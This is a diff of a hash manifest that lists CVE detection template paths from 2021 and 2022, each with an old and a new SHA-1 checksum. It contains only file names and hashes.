+http/cves/2021/CVE-2021-38540.yaml:15ab71adfb784406d94f30668a79a8ad0b89ce82 http/cves/2021/CVE-2021-38647.yaml:7e00013acd51030d8075a01d3d787d7d9dba436b -http/cves/2021/CVE-2021-38702.yaml:a9c917e93f07c0dc5c9c53bdcdd89c84a1f78e9f -http/cves/2021/CVE-2021-38704.yaml:4b594ac64ff5e69aa6dbd6eef41e35cad058848e -http/cves/2021/CVE-2021-38751.yaml:b86489ee43da5b3e080770bcd61964c4d52bdb36 +http/cves/2021/CVE-2021-38702.yaml:32d244ea6b93f0ae4b9d5390db8eaef2c97aea16 +http/cves/2021/CVE-2021-38704.yaml:21c5cf5dec20251845887b879890b03a5cbee909 +http/cves/2021/CVE-2021-38751.yaml:2c79aa10f3fe99ef11f70cfbb6f0d647eae26a64 http/cves/2021/CVE-2021-39141.yaml:dbe238331acce402cf8f76d6fc414b44e5207701 -http/cves/2021/CVE-2021-39144.yaml:d8b375a7a1e74cfdfe93f1ae1a99759fa1126cfc -http/cves/2021/CVE-2021-39146.yaml:abe5ae85450ec9daa96d908e8b94bd253a4cab3c -http/cves/2021/CVE-2021-39152.yaml:e5513dbf946afe11f4abd69354759a1b0e85a295 -http/cves/2021/CVE-2021-39165.yaml:1f5f90e56ed2ba5cf05ca131b357d6d1da3d6104 -http/cves/2021/CVE-2021-39211.yaml:e78c4ac0897df8793ac58a404d2ad8995c1f5c39 -http/cves/2021/CVE-2021-39226.yaml:11241c6bbb64660eeb48d8ec5a0eb4cb81fc8070 -http/cves/2021/CVE-2021-39312.yaml:cd803635b44d4c645953d0f5bb17d701713a0eab -http/cves/2021/CVE-2021-39316.yaml:41d5b9de584f5f085535472f1075fd5bee01615e -http/cves/2021/CVE-2021-39320.yaml:7a416efd6ca10755ec450f667666e66e9f3c5253 -http/cves/2021/CVE-2021-39322.yaml:dd63148e0d81b2dd649becf1a92cb9b59c292ab8 -http/cves/2021/CVE-2021-39327.yaml:c969f7a4b3730e1face05a3e59ebb29e0686ad47 -http/cves/2021/CVE-2021-39350.yaml:b1a3ecf463b564a3d25b60facf598ad62111de19 -http/cves/2021/CVE-2021-39433.yaml:c4fccf625ab071050cb95715c9277a91963fce0e -http/cves/2021/CVE-2021-39501.yaml:70a5946b8a75b813bfa3bef57645dae85869df2a -http/cves/2021/CVE-2021-40149.yaml:8bbf3b3ae3202b394ad33b3b805fca79516ab4ae -http/cves/2021/CVE-2021-40150.yaml:a4ab7d9d3b8b70c5ef044e6790e653bb1aa8dd61 -http/cves/2021/CVE-2021-40323.yaml:2bd9bbd989fb33334bd2bd8a6af4952b9d722fb7 +http/cves/2021/CVE-2021-39144.yaml:c4fd56e1e8390880ced545cf85dd93ed5557255b +http/cves/2021/CVE-2021-39146.yaml:7c049587c45083209ce85c3be03d498d90e1e00f +http/cves/2021/CVE-2021-39152.yaml:06c0b759cdfe0fd583b4ab097bd2784bdef193b2 +http/cves/2021/CVE-2021-39165.yaml:0f5dc64a775aaeeb82fb532804eecf3eb3e497e7 +http/cves/2021/CVE-2021-39211.yaml:807613d2872f14460d6e80ed77f6074671900639 +http/cves/2021/CVE-2021-39226.yaml:5d2d6d2e793f9694095db67e84464c66a5dc9de4 +http/cves/2021/CVE-2021-39312.yaml:ac77a76729e9173f5920bdcfde54b2e962eb4a43 +http/cves/2021/CVE-2021-39316.yaml:50bae42050d161f03e40360acf124204b255cfaa +http/cves/2021/CVE-2021-39320.yaml:7b2dafb88a845b455936a1e6a4f99fdf3f8ee356 +http/cves/2021/CVE-2021-39322.yaml:32d8a50138f608dfea207f88bfc0b1b974229e62 +http/cves/2021/CVE-2021-39327.yaml:e5ae25ce25f0da6854ea00c463455f7d658227e5 +http/cves/2021/CVE-2021-39350.yaml:5b692190e3a2248d89af02172078b43b0500ec3b +http/cves/2021/CVE-2021-39433.yaml:4e9ae563a9cb440793d175eb687f12034d068ba8 +http/cves/2021/CVE-2021-39501.yaml:36fc127b69ba9d447de267faa90babe3b8b43104 +http/cves/2021/CVE-2021-40149.yaml:9866e559c47dde74564cf156fb663dbc7a2f7767 +http/cves/2021/CVE-2021-40150.yaml:1cf195571756b4ab0ddaf11568f3484bd1c29a2b +http/cves/2021/CVE-2021-40323.yaml:5e776f580b5bfe25d0e014830fa51fac8d531469 http/cves/2021/CVE-2021-40438.yaml:f108e69a15aec958d198561eaba7238c49e66062 -http/cves/2021/CVE-2021-40539.yaml:1468ce553b61a63d953a24c51a9142f97593090b -http/cves/2021/CVE-2021-40542.yaml:45a36c147eeab77fc28568c815f69c0f646b6661 -http/cves/2021/CVE-2021-40661.yaml:df60f72d8577b1eba959b197559fec8562edc430 -http/cves/2021/CVE-2021-40822.yaml:740e591d007c25bb2f8b6b594397633e2082d05f -http/cves/2021/CVE-2021-40856.yaml:9347f6377e733f4afe4a992428c2601ecb6aa503 -http/cves/2021/CVE-2021-40859.yaml:66b02ada089c00af2f9713aafa7a6488d79af9c4 -http/cves/2021/CVE-2021-40868.yaml:df844bc15afdc84009a982e0967ee5d3683472ee +http/cves/2021/CVE-2021-40539.yaml:10e6b28f60e5f7562832f73ae8128df59a897633 +http/cves/2021/CVE-2021-40542.yaml:77ceaa60d64960896430698561a0e4d64e3be019 +http/cves/2021/CVE-2021-40661.yaml:a46e9768813968286d052209d0d7bad5d031e54b +http/cves/2021/CVE-2021-40822.yaml:dfa426ff34f05b4f0a06f7db2170e17bcb75c6a3 +http/cves/2021/CVE-2021-40856.yaml:a132b1f35b9ea7ba4f91bb62d49486d68895f6f0 +http/cves/2021/CVE-2021-40859.yaml:6565de0318f9a51e044acc1d6ecea1bda0911a58 +http/cves/2021/CVE-2021-40868.yaml:4ae0c9ec775ca330393ac2c6c8f2d439c644673b http/cves/2021/CVE-2021-40870.yaml:10d5995ec9f06c301aae18504c96ba05761d12e4 -http/cves/2021/CVE-2021-40875.yaml:31b03becb4140f01aabcbb926adb584beee9d5df -http/cves/2021/CVE-2021-40908.yaml:c192163b97a882bd998a1ced4c30c212fc550da5 -http/cves/2021/CVE-2021-40960.yaml:d270970f4388994e80de6aff556fac38930f996f -http/cves/2021/CVE-2021-40968.yaml:828b7f857bdaa3bbc73143f1e12b18fbaf55b5e2 -http/cves/2021/CVE-2021-40969.yaml:066625131df499720a63a95c0ebdcf424130b5bd -http/cves/2021/CVE-2021-40970.yaml:99042fbf91bc2bc55c4a96d146ab183e63acb876 -http/cves/2021/CVE-2021-40971.yaml:03a8f077b0ea0a03b00ce697e775412578b26f0a -http/cves/2021/CVE-2021-40972.yaml:48c9c2d39ecbee1a373fa0e7e775e2ac8457d68f -http/cves/2021/CVE-2021-40973.yaml:07fb0c0388fed9c2a38024efc741d12163700668 -http/cves/2021/CVE-2021-40978.yaml:6880ab9fee10affd32d2c0af47f12b9941f076f0 -http/cves/2021/CVE-2021-41174.yaml:d6182a9d0b6135aa12264f0013590c94532940e4 -http/cves/2021/CVE-2021-41192.yaml:4d934d54282e816c02d071f825358b7b32375ab1 -http/cves/2021/CVE-2021-41266.yaml:9b0e6aecbcec9c786ea00505bd99839534b51643 -http/cves/2021/CVE-2021-41277.yaml:027d127364bbc96ef378312102716dec80cb556c +http/cves/2021/CVE-2021-40875.yaml:814c2db3630488a80594e73d99bd216e12829917 +http/cves/2021/CVE-2021-40908.yaml:718c40d30f31be5528c28793525be3435ed62433 +http/cves/2021/CVE-2021-40960.yaml:1a4729ba8ab9e0f229c6a1329dab597cf59d5407 +http/cves/2021/CVE-2021-40968.yaml:58ca604153ea3108f833cd11f6cf33f5fdbb36f8 +http/cves/2021/CVE-2021-40969.yaml:e08f848c272a8920463bc18b4b2a3d4b1c883f06 +http/cves/2021/CVE-2021-40970.yaml:8aff71a58a8d4202806d45e28a81e39ab3f2214a +http/cves/2021/CVE-2021-40971.yaml:6e14106eaa4d29a383010057f5c51e0725c2a891 +http/cves/2021/CVE-2021-40972.yaml:e8e919a125ebbccde542b5ccfac8f80b4354807c +http/cves/2021/CVE-2021-40973.yaml:930b5865013d1cb1f3d398cbe3607c3a86040162 +http/cves/2021/CVE-2021-40978.yaml:08b10a46513bae3baba9d821ed98b3764d1e5fce +http/cves/2021/CVE-2021-41174.yaml:71e812575d68b2d0509e1ea1ffb7e998e8e025d4 +http/cves/2021/CVE-2021-41192.yaml:cb39d6589215e4d4bea7e2f07511de2ab73577f5 +http/cves/2021/CVE-2021-41266.yaml:8817e5661746dd710d3f6c930dc3db173395b782 +http/cves/2021/CVE-2021-41277.yaml:f75f98f12bac7b67d0dcc4be875d8e44177a6ed8 http/cves/2021/CVE-2021-41282.yaml:65fe7ff0e6f1b11db1844e23e31570fbbe646e1d -http/cves/2021/CVE-2021-41291.yaml:7c987bc593247b9bd28f8e5b7375da1bb365f3fb -http/cves/2021/CVE-2021-41293.yaml:60076a799d25822e7de343c8f64a24b77be9cfc2 -http/cves/2021/CVE-2021-41349.yaml:0011a4bb9ca58a7913d729bca34c702d4dfedf89 -http/cves/2021/CVE-2021-41381.yaml:79830ccdfaaae5198cb7e0594f0def0a46baa983 -http/cves/2021/CVE-2021-41432.yaml:75cf6c109f8090a5062ee4443b8c6723d96fa20f -http/cves/2021/CVE-2021-41460.yaml:fc468f2b184e1999ca15e288c187267ed3f4d29b -http/cves/2021/CVE-2021-41467.yaml:b9595be7ccfa6d53c5d85645b7f6ce6390b816a3 -http/cves/2021/CVE-2021-41569.yaml:ba1161fe76eeb3f03896fd9cbfd3e70b16a9d732 -http/cves/2021/CVE-2021-41648.yaml:ce4ceb0c953709cb78572c61af6e96fcba536297 -http/cves/2021/CVE-2021-41649.yaml:b99a7e2fccb9bf4e412a3294205565b2ee367da4 +http/cves/2021/CVE-2021-41291.yaml:130e8d410baa1394f4fc54a32899812e5d776fe2 +http/cves/2021/CVE-2021-41293.yaml:b860df51d43c4038202e79833c1f00bee468640c +http/cves/2021/CVE-2021-41349.yaml:e0db514a0d15f299bd42a3bb683d8e2b488f1037 +http/cves/2021/CVE-2021-41381.yaml:4ee86107aba8c25c5bd00b364e90a2882f19f812 +http/cves/2021/CVE-2021-41432.yaml:3140c6979177ada667f55bdb2d7e4d1ceff03fc1 +http/cves/2021/CVE-2021-41460.yaml:958033c8d160936ee48d87dcea427cd591435fa3 +http/cves/2021/CVE-2021-41467.yaml:2d6bcc1ef240aa7b292fe24af39930310a87c14d +http/cves/2021/CVE-2021-41569.yaml:3c95fc0f4c4a813f11a4c8d3ccced6881df9f01a +http/cves/2021/CVE-2021-41648.yaml:56955970e173c86bdd630f54607c8f5465be5861 +http/cves/2021/CVE-2021-41649.yaml:dde28a9acdaf76d6e798d26dc92fc47425c66eb2 http/cves/2021/CVE-2021-41653.yaml:8ee8ccd98cb56c5a282d2cb0eee806ceb6a7f3e2 http/cves/2021/CVE-2021-41691.yaml:f598a63d2feec552cd0f7a482d63d3cb99b880f2 -http/cves/2021/CVE-2021-41749.yaml:6db3e844ea1f3f2c8377b579f71241d769fe4e3b -http/cves/2021/CVE-2021-41773.yaml:0e29ba034de4f0b00bb3e2a598ebe81b550e79dd -http/cves/2021/CVE-2021-41826.yaml:4597637f8f667bccdfd15c8f6c626b9d09fac719 -http/cves/2021/CVE-2021-41878.yaml:706d6e84821d9c64d8fc8dd38d53c54f10c360c5 +http/cves/2021/CVE-2021-41749.yaml:c5084f6f9a23b7e98c93388395f261dc0554c373 +http/cves/2021/CVE-2021-41773.yaml:55a2214f30a56a52a7620c09e736a8323dc46b99 +http/cves/2021/CVE-2021-41826.yaml:473a073268213ba8e4778620ea31a5325b781784 +http/cves/2021/CVE-2021-41878.yaml:a4e51d345a60ad6e4badd90d0aac2f5e258babd0 http/cves/2021/CVE-2021-4191.yaml:95833211fac3d524b6667ad4b8670f02f219fa96 -http/cves/2021/CVE-2021-41951.yaml:d54f94d1c36fa483abdd8db68e6086de6b4669ea -http/cves/2021/CVE-2021-42013.yaml:355feca0da110e8596eef34f636d6639d742e518 -http/cves/2021/CVE-2021-42063.yaml:b9eadbf9579406ed73c8826f40355e0093fd4482 +http/cves/2021/CVE-2021-41951.yaml:a4717f15bc882d1c4720b7b58efb7934504b5918 +http/cves/2021/CVE-2021-42013.yaml:430fe15706aae271d355368b7f25663e9af9c090 +http/cves/2021/CVE-2021-42063.yaml:e59a319405ab84ab90c4b24e6570bf538c7aed92 http/cves/2021/CVE-2021-42071.yaml:ca43859622fae8058fee7b8ac38392a662d66c76 -http/cves/2021/CVE-2021-42192.yaml:868ce356bab510e942b9f221eec6f09a8045a3da -http/cves/2021/CVE-2021-42237.yaml:7eeabe14b1aced22e9b241da12e0173a5f5960b1 +http/cves/2021/CVE-2021-42192.yaml:00ec6bcd023513b66d0968c655efd3ec482fcc56 +http/cves/2021/CVE-2021-42237.yaml:0d41ce910215ea8f15fdb5226ee7744665263be8 http/cves/2021/CVE-2021-42258.yaml:48be1eabf98fabf41b662820856f828af9de4f45 -http/cves/2021/CVE-2021-42551.yaml:67e14c19f24d704735e108fce6eb82690fe18ed9 -http/cves/2021/CVE-2021-42565.yaml:66d75a208ab11a6fd80702c98342ad015a52909f -http/cves/2021/CVE-2021-42566.yaml:d4a973f6b597c0279badc3d54a89fcb9a7237e6f -http/cves/2021/CVE-2021-42567.yaml:f703722f276b3ed4377c173f7f4ac617c19a5d9d -http/cves/2021/CVE-2021-42627.yaml:a0d0c93e198240c680af9a9552b380621745ddc0 -http/cves/2021/CVE-2021-42663.yaml:139f50f080be935bad3a46da69f0cf171b6dfb3e -http/cves/2021/CVE-2021-42667.yaml:c25a8fad550f7eced4b0c043e0d155bbb847a5dc -http/cves/2021/CVE-2021-42887.yaml:0b4f9b33f49bda52573080f195ea3008953c33a9 -http/cves/2021/CVE-2021-43062.yaml:a19047a8e197a1952ff09490b0ff743dcfdbd2a8 -http/cves/2021/CVE-2021-43287.yaml:537109b8c167c3553fd557b37ed3c3bfdd416cce -http/cves/2021/CVE-2021-43421.yaml:edfeaafc29471cb59aeef48f2bb104189c336f04 -http/cves/2021/CVE-2021-43495.yaml:56836dd73828e42c05f6df141c46392157830ab1 -http/cves/2021/CVE-2021-43496.yaml:0a5816c81ee6f8d8c777cce58329cd90920a9295 -http/cves/2021/CVE-2021-43510.yaml:9d9cfe0894c1968be2a80a4d3a7c5b5be6527e65 -http/cves/2021/CVE-2021-43574.yaml:4cce81053690bffd99cc0f6960a2b2a85dfad8c3 -http/cves/2021/CVE-2021-43725.yaml:068726e2c9baa997b70909a6b45d82eab7a392bc -http/cves/2021/CVE-2021-43734.yaml:66a73b66d2af99ea0261f38f913b2b9d52a35089 -http/cves/2021/CVE-2021-43778.yaml:5e04df0b36e16808f05709f98b7e00efa3c0c18d +http/cves/2021/CVE-2021-42551.yaml:a21e196af60d9376e35b22853ca4a06c7246f46a +http/cves/2021/CVE-2021-42565.yaml:5e142b1b177e3e6d5d33372107a1ddc415d19182 +http/cves/2021/CVE-2021-42566.yaml:b6834e2fdfffed9d91974a266de2a068ca2b80d4 +http/cves/2021/CVE-2021-42567.yaml:7602f27c3fe51e08353fa0ece11f3a65e96cb246 +http/cves/2021/CVE-2021-42627.yaml:79ed43ff78e093b3a9d7758da4b7890a1b476926 +http/cves/2021/CVE-2021-42663.yaml:2f3dce87781bbd0f89875bc8c69726bc8f5530ca +http/cves/2021/CVE-2021-42667.yaml:e4c902885a95a470df78b30d7f81f2f0305781f4 +http/cves/2021/CVE-2021-42887.yaml:f702a14e50aa88f3eb7bca5a2eb24114b8631f40 +http/cves/2021/CVE-2021-43062.yaml:8833d21cd7fb8f6de0959b9f46ea3e919233ac3a +http/cves/2021/CVE-2021-43287.yaml:8622fed87af1cf01e2c9d82876bdab2d9103ffc5 +http/cves/2021/CVE-2021-43421.yaml:df2796c4b3305dc3786a067206ab1c7e3499c9a3 +http/cves/2021/CVE-2021-43495.yaml:c59699defeb9801618b2d116fb50b512293d5d41 +http/cves/2021/CVE-2021-43496.yaml:76469e9286f805e0c0da240ad8647d3130cb52e6 +http/cves/2021/CVE-2021-43510.yaml:7a90de767bb818a1072d792319d747d4b3026551 +http/cves/2021/CVE-2021-43574.yaml:01f9df573f9a2436241244531c32d3e8f0d2b0c0 +http/cves/2021/CVE-2021-43725.yaml:8e13797c7d71850af0844694215a4241ef94c5b2 +http/cves/2021/CVE-2021-43734.yaml:345b6e6ac9fb9538628e5631bff18752a1c6c4ad +http/cves/2021/CVE-2021-43778.yaml:71fe0c6291c25bdce783892d370d13a314fa9c65 http/cves/2021/CVE-2021-43798.yaml:c61de90f53cdc059822dfec42fb1e228a85100e5 -http/cves/2021/CVE-2021-43810.yaml:81975aefd1d13920fd9522a32246b70776f2f507 +http/cves/2021/CVE-2021-43810.yaml:f601dc8d627a59486db2feccc540d8f4b122afc2 http/cves/2021/CVE-2021-44077.yaml:a16804a30c3a153a726cce39f797ad60351bbc17 -http/cves/2021/CVE-2021-44138.yaml:22f5f078852bb9374f5117689082a8da4bcc138c -http/cves/2021/CVE-2021-44139.yaml:d1427e7dddb22c2e28d317c9752fe89ac0735780 -http/cves/2021/CVE-2021-44152.yaml:a241c2dc5bbe941c52c493f1e01fdb16d3df3703 -http/cves/2021/CVE-2021-44228.yaml:b934238dfb1e0f2054c3df4597a935e79ef4ce11 -http/cves/2021/CVE-2021-44427.yaml:689b237bdf06eee6aa8876626d615a276c2050c2 -http/cves/2021/CVE-2021-44451.yaml:6d3a07985b969c6898fe2e0696e472a8963de34c +http/cves/2021/CVE-2021-44138.yaml:6ccd30ca2c44643e0863273e7f2997c3c724acc8 +http/cves/2021/CVE-2021-44139.yaml:d92104509b66df1ebf083b94b84d803b393765d1 +http/cves/2021/CVE-2021-44152.yaml:8f9453396ff282e2fb975d2d93a4557409adbcf9 +http/cves/2021/CVE-2021-44228.yaml:4b042463704fb88df7b35e730c637347fee2ef1a +http/cves/2021/CVE-2021-44427.yaml:c20b03843cc116d09a29b47540265ddc92640609 +http/cves/2021/CVE-2021-44451.yaml:da51bd96999ce4c0a5c50d301d705b7adfebc30b http/cves/2021/CVE-2021-44515.yaml:341293e42ddaf108e0e76392cf7c431fbef4e954 -http/cves/2021/CVE-2021-44528.yaml:af7639e7fa6995c04d163be219577163e25187ab -http/cves/2021/CVE-2021-44529.yaml:645870f568e541cfa037d6a74253d1a56a3ec327 -http/cves/2021/CVE-2021-44848.yaml:4547572b4346bca18dd6587493074d74b9ef843d -http/cves/2021/CVE-2021-45043.yaml:9d87f518d5ee5ae90dff0d46bdfe376ef29e2f00 -http/cves/2021/CVE-2021-45046.yaml:e3b66473cd5e4259f8ecac9807f4ca3bbd9021d8 -http/cves/2021/CVE-2021-45092.yaml:382515d26d190e320dfdb2789c795b65ef8ba5e0 +http/cves/2021/CVE-2021-44528.yaml:eee5e7e36801ce5b1fa7ce6794ae72cbc6624d25 +http/cves/2021/CVE-2021-44529.yaml:4ba98882357019bad86a744898a77b8f37bb95b1 +http/cves/2021/CVE-2021-44848.yaml:e24b7e79f32a43b60299cc9e0451ee1af1e8572f +http/cves/2021/CVE-2021-45043.yaml:40e15fd55653884183217eb9be3910cdafecfb4e +http/cves/2021/CVE-2021-45046.yaml:30df76b1144a212ef217b26e279aa1a7d57c8e41 +http/cves/2021/CVE-2021-45092.yaml:a4a32de311213a9eacdd194a0e04720a708e89e3 http/cves/2021/CVE-2021-45232.yaml:693753798a382def61043a70a9b8ff2f2043e456 -http/cves/2021/CVE-2021-45380.yaml:4afaf53a624a9921e36f062d1db36d979df017f2 -http/cves/2021/CVE-2021-45422.yaml:61be2b6f0dc993f45ac9154b63080fcfb91d2ec5 -http/cves/2021/CVE-2021-45428.yaml:9aa61e5392302595fd6406ade0dd1246ff228325 -http/cves/2021/CVE-2021-45967.yaml:f287bdff90a8707437bfdceb0024ad9f86b9f238 -http/cves/2021/CVE-2021-45968.yaml:571ed5a91c107d78f0e9af3263390fc8e78d30bd -http/cves/2021/CVE-2021-46005.yaml:e96718a4158b97d953779e3a8fbba8fc25a77273 -http/cves/2021/CVE-2021-46068.yaml:23d8b491dd7f2f4dbe78cbebe2f7b62de45710b8 -http/cves/2021/CVE-2021-46069.yaml:fd11eeeaeb06824f36db27a3dbb638889ba4dc54 -http/cves/2021/CVE-2021-46071.yaml:1733dab6a568ab2869e2a05600ea61b4eedd39ee -http/cves/2021/CVE-2021-46072.yaml:623a623034dbe6b5e595eeb5422b47d81e18eb5d -http/cves/2021/CVE-2021-46073.yaml:29ceefac0ee8323588d845f6204bf6268ddcc7f8 -http/cves/2021/CVE-2021-46107.yaml:3db2a9faa45dfe85a25bb3d7f8fba97a8506c7e0 -http/cves/2021/CVE-2021-46379.yaml:0473fa034b5ce800c1bb9a7934781a00104549bc -http/cves/2021/CVE-2021-46381.yaml:448d59aad54ee07832d2dc43b5a255e4935d14bd -http/cves/2021/CVE-2021-46387.yaml:4b07f621dacf48a0bd95ea64ec99aa90a1985706 -http/cves/2021/CVE-2021-46417.yaml:87f94fd5dcb7f77a3762658e23e51fa6f53f1024 -http/cves/2021/CVE-2021-46422.yaml:c308398c3311b9d4f66c99932634bf19c4b3953e -http/cves/2021/CVE-2021-46424.yaml:c0372e0c2cb3764488525ff96b7c9bc0eb5e6456 -http/cves/2021/CVE-2021-46704.yaml:02a93f5266a586b8009aa6b8db534bb7f249ae4c -http/cves/2022/CVE-2022-0140.yaml:efb55bffd70206b2d2d1cca9a50f95ee9db3b28f -http/cves/2022/CVE-2022-0147.yaml:73fea81ff68a2476a737a619e2cafab3f26a3435 -http/cves/2022/CVE-2022-0148.yaml:dad02c23f8919e3d51bc36a156e633afc9c91995 -http/cves/2022/CVE-2022-0149.yaml:55f45559c3f0f8f2326c2a8f5e5f9e98a98951cf -http/cves/2022/CVE-2022-0150.yaml:e1828a12ac079404bdbf10196ecc9dc910e1d93a -http/cves/2022/CVE-2022-0165.yaml:e56c136c45eb7a65467532e494a3b520c34048ed -http/cves/2022/CVE-2022-0169.yaml:61f768c4509771e3c2745dec134468c3fe2bfea8 -http/cves/2022/CVE-2022-0189.yaml:01507cdd14413e34073157fb689a694434b09c96 -http/cves/2022/CVE-2022-0201.yaml:cbb359084e159236e28902422e7335a6fedaeca3 -http/cves/2022/CVE-2022-0206.yaml:736d5aea9a222361698a25845a692641d99a17c1 -http/cves/2022/CVE-2022-0208.yaml:0bb0148b5c725092f43d83e8ac15158c57549c28 -http/cves/2022/CVE-2022-0212.yaml:943c1f3c9e0f63b51b3527eb56175232df564344 -http/cves/2022/CVE-2022-0218.yaml:30bcf8fd46e4f3c502882e2a9dbc1c0703870dcd -http/cves/2022/CVE-2022-0220.yaml:1e2fdce7fd9a5ca96ffa6fc57f2f53827de641b3 -http/cves/2022/CVE-2022-0228.yaml:4236c98ba40372cf6f6444660affb6909b753b8a -http/cves/2022/CVE-2022-0234.yaml:39c88be2cb341fdf7ebb491e8be1664c5f8c8fd7 -http/cves/2022/CVE-2022-0271.yaml:0aff3180ff630d76961ebb47a672d39689908023 -http/cves/2022/CVE-2022-0281.yaml:f40608e39af6a45736d481883212a2c781a80991 -http/cves/2022/CVE-2022-0288.yaml:9d641887e0b09c5f142febe91a474c668214ebe4 -http/cves/2022/CVE-2022-0342.yaml:186ff65aebe8d3fffc897b52aeeb45845ddc9c24 -http/cves/2022/CVE-2022-0346.yaml:8616022f10e235e11a9b7a39ee0b153b8cbd5c75 -http/cves/2022/CVE-2022-0349.yaml:615f05275641df96c7450319f429381a3aa49174 -http/cves/2022/CVE-2022-0378.yaml:6093450cc4d04ee8d2d1a5180ef0d92db73ebe6d -http/cves/2022/CVE-2022-0381.yaml:e3d8b023ff8ab78e0f87d3c2faec8d0d406c29ef -http/cves/2022/CVE-2022-0412.yaml:ead6fc878124f0abd87286ae9c9fcfa087fd6ae7 -http/cves/2022/CVE-2022-0415.yaml:c9a74d12c1a26dce5d5673a04a16f43b10d178b3 -http/cves/2022/CVE-2022-0422.yaml:183b49b898b25286f25b3ead4ca89b873b15ff62 -http/cves/2022/CVE-2022-0432.yaml:d7aaffecc85d788b7d3d720d045606db11ea70cf -http/cves/2022/CVE-2022-0434.yaml:3a2d14f5831f8782a837f85a1a3883889a3fdb59 -http/cves/2022/CVE-2022-0437.yaml:1a29cdc0b7bc9a9b6f760996c0f7d791e27f023a -http/cves/2022/CVE-2022-0441.yaml:fcb4e4cc9b99c4a8eacf3bde12602c5c5b5e11bf -http/cves/2022/CVE-2022-0482.yaml:3fe47a74d9799217378e4432594481b301669611 -http/cves/2022/CVE-2022-0533.yaml:9c5c45631c6092ea73aca6dd0cda4a0650d9294f -http/cves/2022/CVE-2022-0535.yaml:55c89025e06be4ddf9f6d3634d6c32ae2dbbf05d -http/cves/2022/CVE-2022-0540.yaml:be3f0011238cb0d2a5ba8c0ab72e6223ac0a802d -http/cves/2022/CVE-2022-0591.yaml:c9fc2be9b5b30a282448920e40f519940329e38f -http/cves/2022/CVE-2022-0594.yaml:f6794552920450c7e9844f33cf610e21607bcc0d -http/cves/2022/CVE-2022-0595.yaml:d6c62dc034bb6752460ecd34be32fd250264bf8d -http/cves/2022/CVE-2022-0597.yaml:4824e7cf019a617adcdce22de8e2b00dc2d7a4e8 -http/cves/2022/CVE-2022-0599.yaml:2573299826abfed2a9b26ba88c271014848e3ee8 -http/cves/2022/CVE-2022-0651.yaml:f7ad32b1109abf5f3c622a5d63fbc9f5e920dac9 -http/cves/2022/CVE-2022-0653.yaml:d4a4b332d6be873910cdb4ea5996f5aaaad181e0 -http/cves/2022/CVE-2022-0656.yaml:96cae4d310a63761df5414f08e95e6614e387073 -http/cves/2022/CVE-2022-0658.yaml:bb51219d0245a594e4c2c217a36dd5629c5b3bc6 -http/cves/2022/CVE-2022-0660.yaml:833544122caad24ad225adb60d2b2fa5123f848b -http/cves/2022/CVE-2022-0678.yaml:686268fceccebf299179aa6aee41490056d8f701 -http/cves/2022/CVE-2022-0679.yaml:5770298bbf7d3b0a3f51cd8c263f3c891e224d79 -http/cves/2022/CVE-2022-0692.yaml:faba3bce98be60ad24eb8eaf84495153018848e0 -http/cves/2022/CVE-2022-0693.yaml:1ce5c6d2a598f173e7c920fdee6dd4fcfead037d -http/cves/2022/CVE-2022-0735.yaml:1279dc0e7f3bb65124f8d0683f1fcf75e69e8c33 -http/cves/2022/CVE-2022-0747.yaml:8873df8837498f6bb3dfa0ff32d938ff72cf3449 -http/cves/2022/CVE-2022-0760.yaml:990ac9722ea64f7d269ccd5f6d3757b81f3459fc -http/cves/2022/CVE-2022-0769.yaml:81d522c7c79e65ac014e753324c2cf1ad80e4acc -http/cves/2022/CVE-2022-0773.yaml:02b3c86836919aafb30ddccc4dd59f5ae7aad9b9 -http/cves/2022/CVE-2022-0776.yaml:755c4170495773e1f4bedeffc1e0bc932ba6172a -http/cves/2022/CVE-2022-0781.yaml:6b0ac1e3cc5bd187d2570c92c6b119b7fee60b35 -http/cves/2022/CVE-2022-0784.yaml:e4ce8b6dc8c3e6b46b71baab0d7d26f867e7403b -http/cves/2022/CVE-2022-0785.yaml:503b2ac664fa6ee8a9b859d26356719b363422a8 -http/cves/2022/CVE-2022-0786.yaml:3bf741d8138e1aef158ca51e3192c1f5c6f93dfe +http/cves/2021/CVE-2021-45380.yaml:5d5c90f44aedad0d797cd6b1e7082ca545bd2ad1 +http/cves/2021/CVE-2021-45422.yaml:cf84c54b7a2c16d463e85d7221f7c2964aa83645 +http/cves/2021/CVE-2021-45428.yaml:d3db78037a8c6c42042c1dabccb48f219c832322 +http/cves/2021/CVE-2021-45967.yaml:191c3b73f7fa2881a4a5579025edd488a6331ccb +http/cves/2021/CVE-2021-45968.yaml:d2284d6dbc07acb2a66e26ae23a18a679ffd5aad +http/cves/2021/CVE-2021-46005.yaml:e6237bddc9b202c46871f6c15f2d230c081262f4 +http/cves/2021/CVE-2021-46068.yaml:a4ae23dea61f086cb4d994dd1f8d881f9ee80f29 +http/cves/2021/CVE-2021-46069.yaml:fa0359282f386189e7d499a93529d6524b568e6d +http/cves/2021/CVE-2021-46071.yaml:a2af0e858b43b7ff7760bff7a95a5fe7827de8c3 +http/cves/2021/CVE-2021-46072.yaml:5a5e0b630ce8fc93ec3d32377854766b1a58ce07 +http/cves/2021/CVE-2021-46073.yaml:7049b94bc7fdf5875a29995f2053e642a93db955 +http/cves/2021/CVE-2021-46107.yaml:9ca613044009896c65b098afb6c06d40838735b7 +http/cves/2021/CVE-2021-46379.yaml:82841f18755c4c52f3c08a185ba05098f5c516e7 +http/cves/2021/CVE-2021-46381.yaml:a45950fab4f4d62940db97e285d3d819ed84410c +http/cves/2021/CVE-2021-46387.yaml:44f38b069640bd280b0b4ab9f84e8244e8fb9153 +http/cves/2021/CVE-2021-46417.yaml:05450eaed7fad85925fbbc23c659c855a7027daa +http/cves/2021/CVE-2021-46422.yaml:294190df99da5d4b4d7f59d69d7fd2e65a245d30 +http/cves/2021/CVE-2021-46424.yaml:0279e4d60cbe5719e20c4bd6db7cb797d55a094d +http/cves/2021/CVE-2021-46704.yaml:a5747a9e3fd25d6c5af230defc50dd12d4fa4608 +http/cves/2022/CVE-2022-0140.yaml:1fb9c56cd72d0c5bdecf403ba21c1eb7d615bf00 +http/cves/2022/CVE-2022-0147.yaml:fcdd4d3d6393819be5f10c9bf432bb0c683d7003 +http/cves/2022/CVE-2022-0148.yaml:bd984cc4ca51f0f167497272d7401d242c2558c2 +http/cves/2022/CVE-2022-0149.yaml:39afc957fe16efa543178c6bd335989607ced70f +http/cves/2022/CVE-2022-0150.yaml:85000901e7efe02e160ba90de7e6791acf6bccef +http/cves/2022/CVE-2022-0165.yaml:1de532a2451b9a81a1d7ed451e2527633f9dd016 +http/cves/2022/CVE-2022-0169.yaml:66dd4a31b789b7228ff7f06de7d910c44770fff7 